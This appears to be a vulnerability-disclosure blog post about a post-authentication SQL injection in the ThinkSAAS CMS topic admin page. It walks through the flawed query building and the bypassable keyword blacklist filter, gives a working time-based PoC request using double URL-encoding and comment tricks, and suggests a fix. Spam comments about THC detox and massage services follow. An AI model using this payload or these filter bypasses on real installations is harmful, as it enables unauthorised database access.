跳至主要内容

Thinksaas has a Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php

1. Intro

of this CMS

The repo of ThinksaasS is located at https://github.com/thinksaas/ThinkSAAS , quite a common-used CMS.

Source code of v3.38 could be downloaded at https://www.thinksaas.cn/service/down/ , while passcode of downlaoding is thinksaas9999


of this Vuln

ThinkSAAS before 3.38 has SQL injection via the /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC title parameter, allowing remote attackers to execute arbitrary SQL commands.

2. Walkthrough

Code Review

Risky lines are here =>

Due to unproper conjunction of SQL query sentences (1) and invalid filter (2)

(1) unproper conjunction of SQL query sentences

app/topic/action/admin/topic.php#L42



Let's see how findAll() works:

thinksaas/tsApp.php#L146

正在上传:已上传 51875 字节(共 51875 字节)。


Till now, $where is partly controlled by us, once injecting a singal quote ' via $title, while how to closen this query sentence is still unknown, cause the filtering of   # and --

However, the function of  urldecode() helped us, we can craft a double-URLencoded params, like %25%23 >>> %23 >>> # , ( namely %2523 stands for # )  , as it will BYPASS the filter (#) as follows.  

So we have a vuln of SQLi. Let's see the sanitizing functions.

(2) invalid filter

This CMS have some global functions for sanitizing user-controlled params, in /thinksaas/tsFunction.php#2134 , as its link goes here

function tsFilter($value) {

    $value = trim($value);

    //定义不允许提交的SQl命令和关键字

    $words = array();

    $words[] = "add ";

    $words[] = "and ";

    $words[] = "count ";

    $words[] = "order ";

    $words[] = "table ";

    $words[] = "by ";

    $words[] = "create ";

    $words[] = "delete ";

    $words[] = "drop ";

    $words[] = "from ";

    $words[] = "grant ";

    $words[] = "insert ";

    $words[] = "select ";

    $words[] = "truncate ";

    $words[] = "update ";

    $words[] = "use ";

    $words[] = "--";

    $words[] = "#";

    $words[] = "group_concat";

    $words[] = "column_name";

    $words[] = "information_schema.columns";

    $words[] = "table_schema";

    $words[] = "union ";

    $words[] = "where ";

    $words[] = "alert";

    $value = strtolower($value);

    //转换为小写

    foreach ($words as $word) {

        if (strstr($value, $word)) {

            $value = str_replace($word, '', $value);

        }

    }

 

    return $value;

}

Apart from that foreach ($words as $word) { cannot comletely sanitize those evil words, the Blacklists itself is invalid as well. While SELselect ECT 1  could still be used ( as SELselect ECT 1 => SELECT 1 ).

Also, one is abe to use select/**/1 instead of select 1 , in order to bypass the blackword of select .

As above, select/**/1/**/from/**/(sleep(1) could be used.

In summary, we can craft a special payload ( double-URLencoded + SQL injection ) to trigger SQLi vulns, of course we need login first...

PoC & EXPLOIT

GET /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC%%2527+and/**/1-(select/**/1/**/from/**/(select+sleep(3))a)%2523%2520 HTTP/1.1

Host: thinksaas

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4230.1 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-SG,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Referer: http://thinksaas/index.php?app=search&ac=s&kw=keyword

Cookie: PHPSESSID=6im4ssqo33h8l2d43u78nbr4c3;  ts_autologin=goh59atl3dsk44o4sws48s80co44ww8

Upgrade-Insecure-Requests: 1

 


3. Mitigations

After URLdecode , param sanitizing may still be neccessary, a possible demo is as follows:

if($title){

            //$where = "`title` like '%$title%'";      

            $where = "`title` like '%". $this->escape($title). "%'";

        }


标签:

评论

  1. ThinkSAAS2020年12月3日 21:21

    你好,是否是系统管理员登录的情况下?

    回复删除
    回复
    1. Unc1e2020年12月8日 04:52

      是的, 是在系统管理员登录的情况下。Yes, it's a Post-Auth SQL Injection

      删除
  2. Unow222021年10月12日 11:26

    The best part about this mouthwash is that you can easily carry this small one-ounce bottle anywhere and can swish your mouth for merely a few minutes to detox from THC before the test with ease. There are four predominant types of tests that you should be prepared for before the trial. Knowing how these tests operate and their detection window makes it easier to opt from the various detoxification methods. As per Mayo Clinic, the amount of time THC is evident in urine varies according to the amount and frequency of cannabis consumed by the candidates. To maximize the THC detoxing effects of your workout routine, it’s also great if you can hop in a steam bath or sauna to further sweat out those nasty cannabinoids. If you have the time, patience, and discipline to not touch a bong or chomp on an edible for a relatively short period of time, then the abstinence method is going to come easily to you.

    回复删除
  3. aaronnquercia2022年3月4日 21:39

    How to get to Wynn Las Vegas by Bus, taxi or ride - DRM
    Directions to Wynn Las Vegas (Nevada) with public transportation. 경산 출장안마 The 공주 출장마사지 following transit 진주 출장샵 lines 동해 출장마사지 have routes that 동두천 출장마사지 pass near Wynn Las Vegas and

    回复删除

发表评论

此博客中的热门博文

MKCMS V6.2 has mutilple vulnerabilities

0x00:Lead In Source code can be downloaded  at  https://www.lanzous.com/ib7zwmh This CMS is kinda funny, coz there is a universal filter addslashes  in /system/library.php /system/library.php <?php ... if ( ! get_magic_quotes_gpc ()) { if ( ! empty ( $_GET )) { $_GET = addslashes_deep ( $_GET ); } if ( ! empty ( $_POST )) { $_POST = addslashes_deep ( $_POST ); } $_COOKIE = addslashes_deep ( $_COOKIE ); $_REQUEST = addslashes_deep ( $_REQUEST ); } function addslashes_deep ( $_var_0 ) { if ( empty ( $_var_0 )) { return $_var_0 ; } else { return is_array ( $_var_0 ) ? array_map ( 'addslashes_deep' , $_var_0 ) : addslashes ( $_var_0 ); } _var_0 } While it uses stripslashes somewhere by mistake, let's do a global search about it, we get 3 SQL injections 0x01:PreAuth SQL injection in /ucenter/repass.php MKCMS V6.2 has SQL injection via the /ucenter/repass.php n...
发表评论
阅读全文

ThinkSAAS has a Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php#2 (bypass of CVE-2020-35337)

  0x01 Summay In last December last year, there were security problems caused by improper URLDecode. Reference https://github.com/thinksaas/ThinkSAAS/issues/24 To sum up, it is in ThinkSAAS-master\app\topic\action\admin\topic.php , improper filtering of keyword parameters leads to SQL injection. In last year's fix plan (click Here Direct), the first is $title Changed $kw Variable, And, after tsFilter Function filtering. However, there are still security risks now. # Responsible Vulnerability Disclosure info Title: ThinkSAAS has a Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php Desc: ThinkSAAS before 3.52 has SQL injection via the /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC title parameter(need the privilege of admin), allowing logged attackers to execute arbitrary SQL commands. This is a bypass of CVE-2020-35337. CVSS v3.1 Vector: - 7.5 AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C/CR:H/IR:H/AR:H/MAV:N/MAC:H/MPR:H/...
1 条评论
阅读全文